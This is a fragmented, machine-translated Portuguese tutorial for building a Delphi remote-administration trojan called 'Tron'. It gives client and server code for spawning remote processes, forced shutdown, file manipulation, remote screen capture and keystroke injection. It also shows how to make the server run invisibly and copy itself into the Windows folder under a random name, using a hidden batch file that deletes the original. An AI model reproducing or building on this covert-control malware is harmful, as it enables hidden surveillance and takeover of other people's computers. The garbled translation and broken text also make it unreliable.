Ponha este código dentro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Rea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PROCELIST&gt; ', Buf) = 1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SizeOfList := StrToInt(Copy(Buf, 12, Pos (' | ', Buf)-12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Pos (' | ', Buf)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tate := CSReceivingProcList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vou chamar este tipo de código um ' identifier' de etiqueta - assim pôs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er de etiqueta codificam depois do último identifier de etiqueta em seu OnRead, m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seu caso blo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 nós cortamos fora a informação de tamanho e nomeamos ist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izeOfList inteireza variável que usa Pos (), Cópia () e StrToInt (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ão nós apagamos a informação de tamanho dos dados recebidos. Entã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 nosso CState trocam a CSReceivingProcList para o qual você t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escente a seus interruptores como segue (em sua seção de tipo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ClientStatus = (CSIdle, CSReceivingFile, CSReceivingProcLis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nós precisamos somar nosso CSReceivingProcList troque a nosso caso blo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ão longe você terá algo assim em seu caso se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CState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ReceivingFile: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código para receber o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quererá somar este pedaço de código para receber a lista de process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SReceivingProcList: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o1.Lines.Add(Buf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c(TheSizeOfList, Length(Buf)); se TheSizeOfList = 0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tate := CSIdle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nós estamos somando há pouco a lista (Buf) para nosso Memorando, então decrement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quantia que nós recebemos de TheSizeOfList, e se nós t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ido tudo fixou o interruptor atrás a CSIdle. E isso é isto. Compi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os os lados, tipo ' lp' em seu CommandBox, imprensa entra e assist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a devolve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GERAR UM PROCESSO NA MÁQUIN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característica lhe permitirá digitar algo como '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windows\notepad.exe ' em seu CommandBox, entra imprensa, e tem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de marisco de máquina de servidor que processo (aberto aquele program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ha isto no OnKeyDown de seu CommandBox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Copy(TheCommand, 1, 2) = ' sp'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SPAWNPROC&gt; ' +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py(TheCommand, 4, Length(TheCommand))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o usuário digita ' sp c:\program.exe ' então isto será envia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: ' &lt;SPAWNPROC&gt;c:\program.exe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ADO DE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SPAWNPROC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11); se ShellExecute(0, nada, PChar(Buf), nada, nada, SW_NORMAL)&gt; 32 começam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cket.SendText (' &lt;THERESULT&gt;Process Spawned: ' + Buf)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ket.SendText (' &lt;ERROROCRD&gt;Error que gera processo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pôr aquele identifier de etiqueta codifique em seu ServerSoc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ClientRe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ar o processo nós usamos o ShellExecute função de API.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que você precisará acrescentar ShellAPI a sua lista de usos. Esta fun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ros um número maior que 32 se tem êxito que significa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precise correr um se maior que 32 então tinha êxito, outr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ifica não e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com todas as rotinas de API você pode ganhar informação útil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taxe e funcionalidade da Microsoft Fomentador Network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ww.msdn.microsoft.com - procura para ShellExecute para mais informaç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usar este API funci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ABRIR E FECHAR O CD-ROM DA MÁQUIN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nós usaremos um Botão com sua Legenda fixada ' &amp;Open CD-ROM ',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clicou abrirá o CD-ROM da máquina de Servidor. O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 mudará ' C&amp;lose CD-ROM ' quando clicou, assim se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ado em uma segunda vez, fechará o CD-ROM da máquina de Servid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 que eu não usei: &amp;Close - porque nosso já conecte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 o atalho de &amp;C (quer dizer, se você mudasse seu Conecte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 para ' &amp;Connect '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ora eu estou lhe mostrando como implementar estas características meu modo (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esmo modo como Tron se você usou isto), sinta livre implemen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como você gosta. Isso disse, coloque um Botão em sua Forma e mudan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legenda para ' &amp;Open CD-ROM '. Aqui é o evento de OnClick para ist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5Click(Sender: TObjec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lientSocket1.Activ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Button5.Caption = ' &amp;Open CD-ROM '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OPENCDROM&gt;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5.Caption := ' C&amp;lose CD-ROM '; fim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tro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CLOSECDRM&gt;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5.Caption := ' &amp;Open CD-ROM '; fim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que este é meu 5º Botão, então Button5.Caption. não Faç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queça de ajustar para vestir sua própria aplicação. Isso é selfexplanator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deixa escreva o OnClientRead de nosso Servidor etiquetam identifi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OPENCDROM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CD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o pedaço para identificar o Cliente quer que nós abramos o CD-ROM.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chamando uma rotina para há pouco fazer que que olhares assi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OpenCD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mciSendString (' porta de cdaudio fixa wait' aberto, nada, 0, manivela) = 0 começam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' &lt;THERESULT&gt;CD-ROM: Aberto. '); fim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tro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' &lt;ERROROCRD&gt;Could não abrem CD-ROM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ir o passeio de CD nós usamos uma chamada de API à função de mciSendStr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devolve 0 se próspero. Ok, agora para o CD passeio código íntimo,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CLOSECDRM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CD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seu identifier de etiqueta codificam, e aqui é a rotina de CloseC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CloseCD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mciSendString (' porta de cdaudio fixa fechou wait',nil,0,handle) = 0 começam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' &lt;THERESULT&gt;CD-ROM: Fechado. '); fim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tro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' &lt;ERROROCRD&gt;Could não fecham CD-ROM. ')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mos fazendo o mesmo API chamar aqui mas este tempo, enquanto passando ist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o diferente. O ' pedaço de closed' de porta é algo este AP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 reconhece e fechará o passeio de CD. Note isso para us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API chama você precisará acrescentar MMSystem a sua lista de us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Você poderia ter posto todo o código requerido em seu OnClientRe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lugar da chamada para estas rotinas. Há pouco é muito mais limpo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o e você não enchem para cima seu evento de OnClientRead de códi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omento você ganhou bastante conhecimento para começar escritu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óprio código e pensando aproximadamente como você pode implementar cada seção.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onwards de ponto eu vou principalmente há pouco lhe dando as rotinas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usar em sua aplicação. Eu farei só exceções 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há que algo que eu penso requer mais explicação. Se lemb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o Delphi ajudam se você for inseguro sobre qualquer coi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FECHAR A MÁQUIN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este API chama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tWindowSEx(EWX_FORCE ou EWX_SHUTDOWN, 0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ela linha forçará um reinicie do sistema. Isto deveria ser usado com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último recorre como pudesse danificar dados potencial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COPIAR UM ARQUIVO DE UM LUGAR PARA OUTR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confunda isto com carregar um arquivo. Implementar esta característ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pense aproximadamente como você pode enviar um fio ao servidor con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ro que uma etiqueta que o declara quer copiar um arquivo: ' &lt;ACOPYFILE&gt; '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, e então nome de arquivo velho e caminho, e o nome de arquivo novo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nho. Aqui é uma função de API para copiar o arquiv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YFILE(PCHAR(COPYFROM), PCHAR(COPYTO), VERDADEIR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yFrom seria uma variável de fio que você nomeou para o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 copiado, e CopyTo - outra variável de fio que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nha o arquivo novo e caminho. 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yFrom pôde = ' c:\file.txt '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.and CopyTo pôde = ' c:\folder\file.txt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você há pouco precisaria usar rotinas como Pos () e Cópia () cor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 cada mordeu e os nomeia qualquer variável. Esta função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orno Verdadeiro se próspe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MOVER UM ARQUIV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você usaria o CopyFile () API funcionam novamente, e você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uma coisa semelhante como você fez com sua característica de arquivo de cópia mas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 soma código para apagar o pedaço de CopyFrom. O código para apagar um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File(TheFile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você enviaria para o servidor algo semelhante para CopyFile () -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o inicial, e onde vai ser movido, e uma declaração de etique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o como ' &lt;AMOVEFILE&gt; '. Quando seu Servidor reconhece isto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ha que escrever para um procedimento copiar o arquivo e então apag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, e chama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FAZER UM DIRETÓRIO (O MD)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esta fun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Dir (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a um fio como um parâmetro, assim você pudesse fazer algo com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teDir (' c:\NewDirectory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ou talvez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Dir(MyStringVariableContainingNewDir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função devolverá o Boolean avaliam ' True' - se o diretór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i criado prosperamente. Isto significa você poderia fazer algo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reateDir(TheNewDir) = Retifiqu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(' &lt;Diretório de THERESULT&gt;New criou prosperamente! </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">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também poderia programar um outro seção que envia uma etiqueta de erro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e que declara que o diretório novo não pudesse ser cri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RENOMEAR UM ARQUIV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esta fun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ameFile (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eita dois parâmetros, o primeiro em sendo o nome de arquivo velho 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ndo ser o nome de arquivo novo. Aqui são alguns exempl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ameFile (' c:\file.txt ', ' c:\MyNewFileName.txt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o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ameFile(StrVarContainingOldName, StringVarContainingNewName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função devolverá um Verdadeiro valor se próspe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APAGAR UM ARQUIV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já viu uma vez esta função no pedaço de arquivo de movimen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File (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r um fio que contém o caminho e nome de arquivo. Se nenhum caminho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cificado, tentará apagar o arquivo no diretório de q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 está corre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ADQUIRIR O TAMANHO DE UM ARQUIV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do que eu usado adquiro o tamanho de um arquivo é cria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FileStream do arquivo, e então você pode fazer há pouco MyFileStream.Siz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devolverá o tamanho porém em bytes, se você quer converter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ilobyte sugiro eu que você faz algo assi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File: TFileStream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File := TFileStream.Create(FileToGetSizeOf, fmOpenRead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Tex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' &lt;THERESULT&gt; [' + (Formato ('% .1fKB ', [TheFile.Size / 1024])) +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]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File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nós voltaríamos do Servidor aqui é algo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THERESULT&gt;[234.12kb] - assim você há pouco precisaria apagar a etiqueta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ba o Buf (o Cliente Buf lateral claro que) valor em seu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acrescentei os suspensórios a isto, mas tato livre exibir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ção como você gosta. Talvez você quer fixar a legenda de um Rótul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anho do arquivo, é completamente sua escol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OBTER O TEMPO DE SISTEMA REMOT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Tron conectar ao servidor de Tron, eu tenho um isto no OnConn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meu ClientSocke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SYSTMTIME&gt;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o servidor reconhece esta etiqueta em seu OnClientRead como segu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SYSTMTIME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ket.SendText (' &lt;THETIMEIS&gt; ' + TimeToStr(Now)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a de volta o tempo como mostrado, enquanto usando o TimeToStr () fun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ão, atrás no lado de Cliente, eu tem reconhece a etique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THETIMEIS&gt;, apague a etiqueta, e fixe o Legenda de meu Rótulo de tempo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. Também, eu tenho a mesma chamada como eu faço no evento de OnConnect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 evento de OnClick de meu rótulo de tempo - assim pede o tempo at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clic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CAPTURAR A TEL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traspassarei esta característica em mais detalhe como expõe algu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itos novos. Você precisará ter implementado o carregue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erize para esta seção. Também, se você está usando o incapacite / habili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s de componentes que eu detalhei mais cedo, este seria um lugar b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apacitar seus componentes enquanto a captura de tela é em desenvolvime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vamos estar trabalhando com um componente de captura de tela aqui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carregar do internet como não é incluí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Delphi. Eu explicarei em passos como carregar e instal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. A propósito, se você está correndo dois exemplos de Delph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ze ambas as partes de sua aplicação e feche uma versão enqua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instalamos este componente novo. A versão de Delphi que você part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rto - clique Arquivo, Feche Tudo - como nós há pouco queremos um Delphi em bran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ndo. Se incitou para economizar seu projeto, não esqueça de clicar SI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ponente do que nós precisamos é chamado: TScreenCapture v.1.01. Você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ue de qualquer um dos locais seguint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torry.net/vcl/graphics/displaying/ctkscreencapture.ex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xpaperx.com/files/ctkscreencapture.ex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ue a sua pasta de papéis de Delphi. Corrida uma vez carregad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eenCapture.exe (ou tudo que você carregou isto como). UMA caixa vai popu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o deixou especificar o caminho. É uma idéia boa para instalar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algum lugar em sua pasta de papéis de Delphi (POR EXEMPLO: c:\Delphi6\ScreenCaptur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vez instalado uma aplicação de demonstração se aparecerá. Você po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e que abaixo. Agora aba para Delphi e trinco: Componente, Inst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... Isto exporá um ' Instale caixa de Component'. A Unida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será em branco assim clica o Folheie botão próximo a isto. Localiz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TScreenCapture componente pasta de papéis (o lugar onde você instal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), e haverá um ScreenCapture.pas em lá. Selecione que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tique-taque Aberto. Agora clique o OK no ' Instale caixa de Component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mensagem para confirmar isto se aparecerá dizendo: ' Pacote dclusr.bp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á construído instalado então. Continue? ' - clique Sim.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de informação mostrará há pouco confirmando isto foi instal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que o O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creenCapture.pas será aberto automaticamente nesta fase ass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o seleto, Feche Tudo. Você será incitado co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Exceto mudanças projetar dclusr? ' Clique Sim. Você pode abrir ago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ção separa nov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se você olha para sua Paleta de Componente (você poderia ter que enrol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longo de um pequeno - dependendo qual versão de Delphi tem você) l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uma aba nova: TenKSupport - e debaixo desta aba nosso ScreenCaptu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ija, agora começar funcionamento em nossa característica de captura de tel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Botão em sua Forma e fixe a Legenda a algo co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Boné Screen'. Aqui é o OnClick evento código para este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ClientSocket1.Active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REDLOCALAS := ' £ £3X£S2$1A29.JPG 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GETTHECAP&gt;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de nosso StoredLocalAs variável de fio global - é usado qu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carregamos um arquivo como o nome e local onde s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ado. Note que eu não incluí o caminho de nossa imagem de JPG.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os que será armazenado no mesmo caminho como nós somos dentro no mo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 mesmo caminho como o Cliente está correndo dentro). eu usei o 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£ £3x£s2$1a29.jpg ' como é altamente improvável que haverá um JP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agem já daquele no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ando para o Servidor, você precisará derrubar seu ScreenCaptu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 em sua Forma de Servidor. Fixe sua propriedade de Jpeg para Retificar com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queira estar adquirindo .bmp esconda bonés. Eles são muito muito gran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agora nós precisamos identificar a etiqueta em nosso OnClientRead e levar,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ze um boné de tel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GETTHECAP&gt; ', Buf) = 1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1} ScreenCapture1.GetScreenShot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2} ScreenCapture1.Shot2.SaveToFile (' $$3x£s2$1a29.jpg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3} RequestedFile := ' $$3x£s2$1a29.jpg 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4} SendClientFile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sto é como nós levamos um screenshot que usa nosso ScreenCaptu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. É armazenado em memória dinâmic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qui nós estamos economizando o boné de tela de memória dinâmica abaix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nome de geringonça - mas ligeiramente diferente ao nome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o de cliente; ' $$' em vez de ' £ £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ós fixamos nosso boné de tela para ser um arquivo pedido que usa nosso velh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edFile variável de fio glob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gora nós precisamos chamar nosso procedimento que enviará o arquiv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vamos precisar acrescentar algum código a nosso procedimento de SendClientFi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ar nosso arquivo de captura de tela depois que nós enviássemos isto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e. Nós precisaremos somar código logo após esta linh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3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Socket1.Socket.Connections[0] .SendStream(FS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is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FileExists (' $$3x£s2$1a29.jpg ')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File (' $$3x£s2$1a29.jpg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deveria ser posto dentro logo antes o salvo palavra chave - só limp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ima depois de enviar o boné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ÁS PARA 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em Tron eu usei outra Forma para exibir o boné de tela. Eu v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re para você que método aqu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 Arquivar, Novo, Forma - criar uma Forma nova para seu Cliente.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componente de Imagem (debaixo da aba Adicional de seu Compon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ta) nesta Forma e fixou seu Alinhe propriedade a alClient. També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 a propriedade de Extensão da Imagem para Retificar assim o boné de tela ajust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bem nesta Imag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e seu Form2 novamente e fixe sua propriedade de BorderStyle a bsNone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ova a Windows topo borda clássic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precisaremos reconhecer agora se o arquivo que nós recebemos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boné de tela ou não. Volte para seu Unit1 e para o ClientSoc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Read. Enrole até onde nós temos nosso caso bloco de declar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CSReceivingFile: ' - e olha para a seção onde nós receb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so arquivo. O pedaço depois de TheFileSize = 0, onde nós fixamos nosso interruptor atrá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SIdle e livra nosso TFileStream. Aqui, nós precisamos somar este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FileExists (' £ £3x£s2$1a29.jpg ') = Retifiqu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/ / O arquivo que nós recebemos era um boné de tela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2.IMAGE1.PICTURE.LOADFROMFILE (' £ £3X£S2$1A29.JPG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2.Show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eteFile (' £ £3x£s2$1a29.jpg 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você some ' Jpeg' para seus usos listam de Unit1, com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i estar trabalhando com eles aqu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 Arquivar, Salve Tudo. Salve Unit2 na mesma pasta de papéis como Unit1 de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e. Agora compile cada lateral de sua aplicação. Se você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itado com e ' Information' encaixotam declaração sobre referências para Form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 trinco Sim. OK, corra e teste seu Botão. Seu Form2 estour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ima mostrar o boné de tela uma vez carregou. Há uma captura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ria ter notado. Quando tiver o boné de tela, você não pode adquirir liberte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. Tão atrás para nosso Unit2 de nosso Cliente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um evento de OnClick para seu Image1 em seu Form2 e ponha n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2.Hid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um evento de OnKeyPress para seu Form2 e ponha naquela mesma linh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é assim se nós apertamos uma chave ou fazemos tique-taque no boné de tela que s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ndido. Compile e teste. Você também poderia querer somar outro Bo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olver o boné de tela para cima qual é fácil - só some um Bo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 pôs: ' Form2.Show; ' no OnClic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MOSTRAR UM QUADRO NA MÁQUINA REMOTA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característica exibirá um quadro de sua especificação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tema remoto no centro da tel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Botão e um Edite caixa em sua Forma. Mude a Legenda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Botão para: ' P&amp;ic de espetáculo ' (se você quer mudar esta legenda, há pouc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juste o código para vestir sua legenda nova) e muda o Edite caix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ie a PicPath. Aqui é o evento de OnClick para nosso Botã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7Click(Sender: TObject)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Button7.Caption = ' p&amp;ic de Espetáculo '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SHOWTHPIC&gt; ' + PICPATH.TEXT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on7.Caption := ' &amp;Remove Pic'; fim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tro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REMOVEPIC&gt;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on7.Caption := ' p&amp;ic de Espetáculo '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Botão acontece para ser meu 7º Botão - se lembre de ajustar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ópria aplicação. É uma idéia semelhante a nosso open/close Botão de CD-RO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 nós trabalharemos no código por mostrar o quadro. Aqui é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lientRead evento identifier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SHOWTHPIC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11); / / Você precisará declarar o glob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balBuf := Buf; / / variável de fio ' GlobalBuf' como nó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ThePicture; / / estará usando isto em outro procedimento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apagamos a etiqueta, nomeie GlobalBuf com os conteúdos de Bu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terá notado que nós estamos carregando o quadro sobre uma Imagem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2. Assim vá Arquivar, Novo, Forma. Ponha um componente de Imagem em seu Form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fixou seu Alinhe propriedade a alClient. Remova a borda d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(jogo o Form2 propriedade de BorderStyle para bsNone) e fixou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cione propriedade a poScreenCenter. Se você fixasse o FormSty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 de seu Form2 para fsStayOnTop, esta Forma que mostra o quad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pre esteja em cima. Também, fixe o propriedade de Extensão de sua Imagem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adei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pôr dentro nosso remova código de quadro. Há pouco volte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lientRead em seu Unit1 e pôs nis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REMOVEPIC&gt; ', Buf) = 1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2.Hide;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ocket.SendText (' &lt;THERESULT&gt;Picture Removed. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">'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você compilasse: Arquive, Salve Tudo–e salva o Unit2 dentro o mes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a de papéis como seu Unit1. Agora compile tudo, e se incitou com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ções encaixotam sobre referências a Unit2, clique Sim. Agora tudo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cise fazer seja posto o local (POR EXEMPLO: c:\pic.jpg ou c:\pic2.bmp)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adro para mostrar na máquina remota em seu PicPath e trin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Bot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JOGAR UM ARQUIVO DE .WAV -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e este API funciona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NDPLAYSOUND(PCHAR(WAVPATHANDFILENAME), SND_ASYNC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ia enviar o caminho de .WAV e nome de arquivo (POR EXEMPL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MyMusicFile.wav) e então entra as informações em um f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ável e passa isto como um PChar como o primeiro parâmetro d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. Devolverá Verdadeiro se próspe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DIGITAR CHAVES PARA O SISTEMA REMOT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lhe permitirá digitar algo em um Edite e tenha tudo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digita, digitou na máquina remota na janela ativa.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ela ativa que é qualquer janela está em foco àquele pont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. Nós teremos dois modos: ‘typer modo ' em, e ‘typer modo ' for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ós usaremos um CheckBox para trocar entre os modos (isto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sentido mais em um tempo–ou se você usou Tron que você sab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ipo). Se nós acendermos a modo de typer, nós poderemos digitar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áquina remo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sta característica, nós estaremos usando um componente para o qual você precis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ue SendKeys chamado. Eu caminharei você por instalar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 carregue o componente de qualquer um dos URLs seguint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torry.net/vcl/system/keys/sendkeys.zi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xpaperx.com/files/sendkeys.zi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tiver alguns Delphis correndo, economize sua aplicação e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abaixo aparte de um - e vai Arquivar, Feche Tudo–assim você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do com um ‘' em branco corrida de Delph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unzip o SendKeys.zip em uma pasta de papéis em algum lugar em seu sistema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ão aba para Delphi. Vá para Componente, Instale Componente, e Folhe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o nome de arquivo de Unidade. A Unidade você desejo é um SendKeys.pas e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ja em algum lugar em sua pasta de papéis (onde você extraiu o arquivo de vig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)–você poderia ter que passar por alguns subdirectories para adquirir a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o como: ‘\LIBRARY\DELPHI\COMPONENTER\SENDKEYS\SENDKEYS.PAS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a a Unidade e então clique o OK para instalar o componente.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de confirmação se aparecerá, clique Sim. Agora uma caixa de informaçã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que o OK–e Delphi abrirá o SendKeys.pas inicialmente. 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e o componente é instalado, assim vá Arquivar, Feche Tudo. Tenha certez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clica Sim na caixa de confirmação que se aparecerá declarando aproximad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danças econômicas para projetar dclus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volte para sua pasta de papéis de SendKeys e passe por cada pasta de papéis at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adquire onde os arquivos são. Haverá um arquivo de Sendkeys.dcu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. Leve uma cópia deste arquivo e cole em pasta de papéis de Delphi\Li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ria ser algo como Delphi6\Lib, ou Delphi\Delphi5\Lib–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depende como você instalou Delphi. Procure a pasta de papéis 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não está segu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agora olhar debaixo de sua aba de Amostras de sua Paleta de Component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o componente novo. Agora atrás para nossa aplicação–aberto amb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s novamente (o Cliente e Servidor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L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um Edite e uns componentes de CheckBox em sua Forma. Mud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e Nome a TyperBox. Mude o Legenda de seu CheckBox a ‘FORA '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e um evento de OnClick para isto com o código segui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CheckBox1Click(Sender: TObjec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heckBox1.Checked = RETIFIQU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/ / nós queremos estar em modo de typer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CKBOX1.CAPTION := ' EM! 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ableComponents; / / chame meu procedimento para incapacitar componen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Socket.SendText (' &lt;TYPEMODEA&gt; '); / / envie mod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/ / volta o modo de typer for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CKBOX1.CAPTION := ' OFF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ientSocket1.Socket.SendText (' &lt;TYPEMODEB&gt; '); / / envie para modo B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ableComponents; / / chame meu procedimento para os habilitar nov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quer dizer que está acontecendo aqui, quando nós clicamos nosso CheckBox, a legend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e a ‘EM ' e um pedido estar em modo de typer será envi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 enviando a etiqueta: ‘&lt;TYPEMODEA&gt; '. Se nós clicamos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Box novamente, o modo de typer será virado fora enviand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&lt;TYPEMODEB&gt; ' etiquetam e nossa legenda de CheckBox mudará atrás para FORA. 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emente recomende implementar o incapacite e habilite componen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s detalharam na seção: COMO CARREGAR UM ARQUIVO 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escreveria um procedimento que contém código para fixar os Habilitara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dade de todos os componentes em sua Forma para Falso, e o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para fixar o deles/delas Permitiu a Retificar atrá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, Nosso TyperBox que evento de OnKeyPress deveria se parecer,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TyperBoxKeyPress(Sender: TObject; var Teclam: Chamusque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Send: fi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heckBox1.Checked = RETIFIQU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Send := Chave; / / há pouco nomeia KeySend com a chave apert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Socket1.Socket.SendText(KeySend); se (Chave = #13) então / / se nós apertamos entre então há pouco claro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/ / TyperBox e acrescenta as chaves a nosso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o1.Lines.Add (' * * Chaves Digitaram: ' TyperBox.Text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rBox.Clear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ve := #0; / / isto só adquire liberte de um som de ding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/ / adquira quando você aperta entre dentro um Ed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nós estamos enviando há pouco as chaves digitadas em nosso TyperBox Edit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que seu componente de SendKeys em sua Forma de Servidor. Agora, nós precisar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escentar um interruptor novo a nosso tipo de TServerStatus. Some o ‘SSTyperMode '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mostrad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erverStatus = (SSIdle, SSReceivingFile, SSTyperMode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vá para seu evento de OnClientRead, e some estes etiquetam identifie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os (' &lt;TYPEMODEA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te(Buf, 1, 11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tate := SSTyperMode; fim; se Pos (' &lt;TYPEMODEB&gt; ', Buf) = 1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tate := SSIdle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osso código para nosso interruptor novo é o seguinte. Ponha isto em seu caso bloco de declar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STyperMode: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Keys1.SendKeys(Buf)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isso é isto. Aquela linha usará nosso componente de SendKeys e envia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quer Buf iguala à janela ativa. Compile e tes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Se você está testando o Cliente e Servidor em seu sistem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você digita algo em seu TyperBox com seu CheckBox conferi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M posição, você criará uma volta de digit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ESCONDER SUA FORMA DE SERVIDOR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o permitirá a ter seu invisibly de corrida de Servidor. Requ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ação de seu arquivo de fonte de projeto a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nte de projeto é um arquivo de .DPR que contém o começo para cima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sua aplicação. Vá para seu Servidor e Projeto de trinco, Visã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te. Some a linha mostrada em tipo negrito assim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tion.Initialize; Application.ShowMainForm := Fals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tion.CreateForm(TForm1, Form1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tion.CreateForm(TForm2, Form2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.Run; fi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seu Servidor correrá escondido. Compile e teste. NOTA: Você va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cise fechar seu Servidor por Ctrl+Alt+D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TER SEU SERVIDOR EGO-INSTALE DEBAIXO DE UM NOME FORTUIT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seu Servidor é corrido que moverá à pasta de papéis de janelas abaix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fortuitamente gerado e começo que correm de lá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começamos no evento de OnCreate de nossa Forma. O seguinte é isso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evento olhará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FormCreate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WinDir: ordem [0 ..255] de Serviço doméstico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irNoSlash: fio; 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1} CurrentDir := ExtractFilePath(ParamStr(0)); / / por exemplo c:\MyServer \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2} GetWindowsDirectory(GetWinDir, 255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3} WinDirNoSlash := GetWinDir; / / por exemplo c:\windows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Dir := WinDirNoSlash + ' \ '; / / por exemplo c:\windows \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4} DriveOfWin := Copy(WindowsDir, 1, 3); / / por exemplo c :\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rName := RandomName; / / nós escreveremos esta função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um tempo. Devolverá um no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5} se (CurrentDir &lt;&gt; WindowsDir)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aqui nós não estamos no dir de janel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cópia nosso servidor na pasta de papéis de janelas debaixo do fortuit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gerou no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6} CopyFile(PChar(ParamStr(0)), PChar(WindowsDir + ServerName)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ADEIRO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/ íntimo nossa aplicação ativando o evento de OnDestro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.Terminate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declarar as variáveis de fio globais seguintes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fas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Dir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Dir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rNam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OfWin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mbre isso há pouco é um encurtou abaixo modo de fazer cada como um separa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ção. Aqui são as explicações de ponto numerada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sto é como nós adquirimos o caminho nosso Servidor está correndo dentro e nome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Dir com o result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ós estamos chamando o Windows API funcionam GetWindowsDirectory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surpreendentemente devolva o caminho cheio do diretório de janel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omeia para nossa ordem GetWinDir com is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ós precisamos entrar o diretório de janelas em um fio assim nós nome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conteúdos de ordem para o fio WinDirNoSlash. Eu chamei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irNoSlash variável porque o caminho devolveu p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WindowsDirectory será algo como: ' c:\windows ' s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 de trás-golpe no fim - assim o próximo passo é nomear nosso at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Dir com o valor de WinDirNoSlash e soma um ' \ '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qui nós estamos copiando fora os primeiros 3 caráter do WindowsDi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será o passeio o diretório de janelas é aceso. Nós precisaremos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ção para mais tarde. O próximo passo é gerar um nome fortui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nosso Servidor chamando uma função que nós escreveremos em um momen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qui nós conferimos se o diretório no que nosso Servidor é não for igual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ório de janelas. Se não é igual ao diretório de janelas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ificando nós não estamos no diretório de janelas - o entre no códi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queie abaix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ParamStr(0) é uma chamada de função que devolve o caminho e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programa executando, em nosso caso será algo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MyServer\Server.exe - ou qualquer nome que é. Poderia s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o como a:\TronServer.exe - dependendo do nome e loc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programa executando (seu Servidor neste cas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 nós estamos copiando nosso Servidor no diretório de janelas abaix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fortuitamente gerado (ServerName). Nós queremos fechar e apagar ag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ão atual e corre a versão no diretório de janelas.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Destroy é incendiado logo antes isto seus fins de aplicação.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evento nós podemos codificar a remoção de nosso Servidor e a chamada de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 de diretório de janelas. Isto é terminado por criar e chamar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O (ou morcego) arquivo que você vai precisar saber faz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faz isto da mesma maneira como você criaria um arquivo de texto mas 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xtensão de .BAT. Se você como você pode tentar isto se acostum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ndo morcego arquiva em Delphi. Crie uma aplicação nova e coloqu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toe em sua Forma com o código de OnClick seguinte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dimento TForm1.Button1Click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Name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File: TextFile; / / tipo manipulava arquivos de texto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tName := ' c:\MyBatFile.bat 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gnFile(BatFile, BatName); / / nomeia para nosso TextFile o BatNa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write(BatFile); / / cria um arquivo novo e abre isto para escrev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ln(BatFile, ' c: '); / / escreve uma linha em nosso TextFile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riteln(BatFile, ' o cd \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riteln(BatFile, ' md NewFolder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File(BatFile); / / fecha nosso fim de TextFil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que. Clicando seu Botão criarão um arquivo de morce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MyBatFile.bat que conterá código para createing uma pasta de papé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mado ' NewFolder' em seu c :\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que você está bem familiarizado com isso, deixa olhar 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o de OnDestro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o TForm1.FormDestroy(Sender: TObject)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Name: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File: TextFil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Info: TProcessInformation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UpInfo: TStartupInf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(CurrentDir &lt;&gt; WindowsDir)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1} BatName := WindowsDir + ' $$33tmp6699.bat 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ignFile(BatFile, BatNam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write(BatFil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-} Writeln(BatFile, ' :try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' del " ' + ParamStr(0) + '"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' se existe " ' +ParamStr(0)+ '" ' + ' try' de goto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DriveOfWin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2} Writeln(BatFile, ' o cd \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' o cd ' + WindowsDir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ServerNam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' :delbat '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|} Writeln(BatFile, ' del " ' + BatName + '" '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-} Writeln(BatFile, ' se existe " ' + BatName + ' delbat' de " goto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File(BatFile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todo o código seguinte há pouco está lá correr nosso morcego escondido}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3} FillChar(StartUpInfo, SizeOf(StartUpInfo), $00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UPINFO.DWFLAGS := STARTF_USESHOWWINDOW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UPINFO.WSHOWWINDOW := SW_HIDE; se CreateProcess(nil, PChar(BatName), nada, nad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so, IDLE_PRIORITY_CLASS, nada, nada, StartUpInf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Info)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oseHandle(ProcessInfo.hThread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oseHandle(ProcessInfo.hProcess); fim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é muito mais simples que olha. Novamente nós estamos dizendo, se nós so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na pasta de papéis de janelas, então execute o bloco de código - e aqui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está entrando em neste bloco de códig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qui nós estamos nomeando para nosso BatName o caminho de diretório de janelas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$$33tmp6699.bat ' que é há pouco um nome temporário como este morcego s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gou quando fez seu trabalho. Eu chamei isto que como é alt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avelmente já haverá um morcego daquele nome nas janel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a de papéis. Assim BatName será nomeado algo co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windows\$$33tmp6699.ba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qui nós estamos escrevendo este código em nosso $$33tmp6699.bat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:try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 " c:\MyServer\Server.exe "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existe " c:\MyServer\Server.exe " goto prova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 :\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d \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:\windows de cd \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dfdemsdf.ex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:delba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 " c:\windows\$$33tmp6699.bat "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existe " c:\windows\$$33tmp6699.bat " goto delba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 que eu preenchi alguns pedaços com o que eles poderiam igualar.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 o ' Assdfdemsdf.exe' é há pouco um exemplo de um fortuit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gerado de nosso Servidor. Isso é bastante direto; este morce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pouco apaga nosso servidor em seu local atual e nomeia, e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idas nosso servidor novo. O morcego se apaga ent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odo o código seguinte depois que ponto 3 seja correr nosso morcego l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ndido. Nós estamos usando API chama para criar um processo escondido para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cego. Se você gostaria de dar uma olhada em detalhes neles, observ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 StartUpInfo' estruturam no local de MSDN. Tudo que você realmente precisa sab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para nosso propósito é que isto correrá o morcego escondido de vis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, deixa código nossa função de Random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 TForm1.RandomName: fio; v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Buf1: array[0 ..4] de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as: array[0 ..2] de fio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Buf2: fio;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Buf1[0] := ' Sfctriyc'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Buf1[1] := ' Wjcuiuwe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1[2] := ' R2gcater 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1[3] := ' Ptdsetfo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1[4] := ' Mngmeg23 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ters[0] := ' qwertyuioplkjhgfdsazxcvbnm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ters[1] := ' zaqxswcdevfrbgtnhymjukilop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ters[2] := ' mznxbcvlaksjdhfgqpwoeiruty'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domiz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2 := NameBuf1[Random(5)]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2 := Copy(NameBuf2, 1, Random(5)) +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py(Letters[Random(3)], Random(23), 3) +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py(NameBuf2, 5, Random(3)); se (Length(NameBuf2) &lt;&gt; 8) entã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c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2 := NameBuf2 + Copy(Letters[Random(3)], 10, 8,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gth(NameBuf2)); fim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Buf2 := NameBuf2 + ' .exe '; se FileExists(WindowsDir + NameBuf2) = Falso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:= NameBuf2; f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come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e := ' Sfctriyc.exe'; fim; fim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é meu modo de gerar um nome fortuito. Se você pode pensar de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o melhor por todos os meios escreve sua própria função mas isto faz b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Tron. Inclua aquela função em sua aplicação e você está pro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ilar e testar. Se você quer saber o que vai em aqui por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está interessado por escrito sua própria função de nome fortuita que eu v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ique o que eu fiz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 eu nomeio para cada índice de minha ordem NameBuf1 com um nome.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ser qualquer coisa assim eu o sugestiono mudança pelo menos estes nomes. Ent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óxima ordem: Cartas - tem cada índice nomeado com um difer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essão do alfabe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omento o Randomize procedimento é chamado que inic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gerador de número fortuito de Delphi. Você precisa chamar este 